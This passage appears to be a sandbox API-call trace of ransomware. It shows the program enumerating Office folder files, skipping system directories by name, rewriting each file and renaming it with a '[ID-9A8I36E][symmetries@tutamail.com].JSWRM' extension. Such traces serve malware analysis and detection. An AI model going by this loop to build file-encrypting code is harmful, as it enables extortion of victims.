lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0117.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0117.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0117.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0117.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.362] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME23.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme23.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME23.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme23.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.363] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ee38, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME24.CSS", cAlternateFileName="")) returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2=".") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="..") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="...") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="windows") returned -1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="recovery") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="perflogs") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="documents and settings") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="system volume information") returned -1 [0117.363] lstrcmpiW (lpString1="SCHEME24.CSS", lpString2="msocache") returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME24.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME24.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME24.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME24.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME24.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME24.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0117.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME24.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme24.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.364] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=126520) returned 1 [0117.364] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ee30) returned 0x24c1d0 [0117.364] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ee30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1ee30, lpOverlapped=0x0) returned 1 [0117.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.390] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ee30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1ee30, lpOverlapped=0x0) returned 1 [0117.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.390] CloseHandle (hObject=0x314) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0117.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0117.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0117.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0117.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0117.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.391] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME24.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme24.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME24.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme24.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0117.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.392] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fcee, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME25.CSS", cAlternateFileName="")) returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2=".") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="..") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="...") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="windows") returned -1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="recovery") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="perflogs") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="documents and settings") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="system volume information") returned -1 [0117.392] lstrcmpiW (lpString1="SCHEME25.CSS", lpString2="msocache") returned 1 [0117.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME25.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME25.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME25.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0117.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME25.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME25.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME25.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0117.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0117.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0117.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME25.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme25.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.394] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=130286) returned 1 [0117.394] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fce0) returned 0x24c1d0 [0117.394] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fce0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fce0, lpOverlapped=0x0) returned 1 [0117.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.406] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fce0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fce0, lpOverlapped=0x0) returned 1 [0117.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.407] CloseHandle (hObject=0x314) returned 1 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0117.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0117.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0117.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0117.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0117.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME25.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme25.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME25.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme25.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0117.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0117.409] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d1b6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME26.CSS", cAlternateFileName="")) returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2=".") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="..") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="...") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="windows") returned -1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="recovery") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="perflogs") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="documents and settings") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="system volume information") returned -1 [0117.409] lstrcmpiW (lpString1="SCHEME26.CSS", lpString2="msocache") returned 1 [0117.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME26.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME26.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME26.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0117.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME26.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME26.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME26.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0117.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0117.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0117.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME26.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme26.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=119222) returned 1 [0117.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d1b0) returned 0x24c1d0 [0117.411] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d1b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d1b0, lpOverlapped=0x0) returned 1 [0117.426] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.426] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d1b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d1b0, lpOverlapped=0x0) returned 1 [0117.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.426] CloseHandle (hObject=0x314) returned 1 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0117.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0117.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0117.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.427] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME26.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme26.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME26.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme26.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0117.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: 